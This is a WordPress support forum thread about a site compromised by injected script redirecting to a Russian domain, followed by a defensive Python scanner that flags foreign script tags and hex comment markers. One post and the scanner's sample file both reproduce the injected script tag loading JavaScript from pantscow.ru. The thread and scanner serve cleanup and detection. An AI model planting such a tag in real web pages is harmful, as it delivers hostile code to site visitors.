WordPress 3.0 and XSS (4 posts)

  1. eric-generic
    Member
    Posted 3 years ago #

    On Sunday, 11 July, our website -- erictric.com -- was exploited by means of XSS, which directed to a domain name along the lines of pantscow.ru.

    We were forced to revert to a backup, unfortunately, which ensured I lost a full night of sleep.

    I am frightened by the thought of not knowing of the origin of this attack, and fear it may happen again. Our site has been hack-free since inception, and the only thing we've changed recently is an upgrade to WordPress 3.0 when it was released.

    Does anyone have any idea as to whether or not there may be security holes in 3.0? Is there a way I can find out how the attack came about? How to prevent it?

    I can say that our passwords are all very secure (mixed numbers, letters, special characters), and our folder perms are set to 755, file perms to 644.

    Any suggestions would be greatly, greatly appreciated.

  2. esmi
    Theme Diva & Forum Moderator
    Posted 3 years ago #

    There are no known security holes in WP 3.0 at present. However, it is possible that a plugin (or, in theory, even a theme) could have introduced a security issue. I'd suggest re-checking all plugins and getting rid of any that you're not 100% sure about. Also, review Hardening_WordPress and read:

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

  3. eric-generic
    Member
    Posted 3 years ago #

    Thanks for the advice. It just doesn't make sense. Everything, for the most part, has remained the same.

  4. ivie
    Member
    Posted 3 years ago #

    Just got the same problem with my site. After checking everything, I found this script in the WordPress index.php file, not in the template index file.

    <sc ript type="text/javascript" src="http://pantscow.ru:8080/Gigaflops.js"></sc ript>
    <!--cc1a48d2b07574da5394e16fab30de34-->

    Try to check index, header or any file you think the script could be added to.
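As an added defender-side example (not code from this thread or from WordPress itself), the script below scans files for the kind of injection ivie describes: a script tag whose src points to a host outside an allow-list, plus the bare 32-hex-digit HTML comment marker that sat next to it. The sample index.php content and the allowed host example.com are constructed assumptions for the demonstration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

# A <script ...> tag whose src attribute is an absolute http(s) URL.
SCRIPT_SRC_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)', re.IGNORECASE)
# A bare 32-hex-digit HTML comment, the marker reported beside the injected tag.
HEX_MARKER_RE = re.compile(r'<!--\s*[0-9a-f]{32}\s*-->', re.IGNORECASE)


def scan_text(text, allowed_hosts):
    """Return (line_number, kind, detail) findings for one file's content."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in SCRIPT_SRC_RE.finditer(line):
            url = m.group(1)
            host = urlsplit(url).hostname or ""
            # Scripts served from hosts you did not put there are the signal.
            if host not in allowed_hosts:
                findings.append((lineno, "external_script", url))
        if HEX_MARKER_RE.search(line):
            findings.append((lineno, "hex_marker", line.strip()))
    return findings


def scan_tree(root, allowed_hosts, suffixes=(".php", ".html", ".js")):
    """Walk a WordPress install and map each suspicious path to its findings."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"), allowed_hosts)
            if hits:
                results[str(path)] = hits
    return results


# Constructed sample mimicking the injected lines reported in the thread.
SAMPLE_INDEX_PHP = """<?php
/** Front to the WordPress application. */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
<script type="text/javascript" src="http://pantscow.ru:8080/Gigaflops.js"></script>
<!--cc1a48d2b07574da5394e16fab30de34-->
"""

if __name__ == "__main__":
    for lineno, kind, detail in scan_text(SAMPLE_INDEX_PHP, {"example.com"}):
        print(f"line {lineno}: {kind}: {detail}")
```

Run scan_tree against the web root with your own hosts in the allow-list and diff the result against a known-clean copy of the same files.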
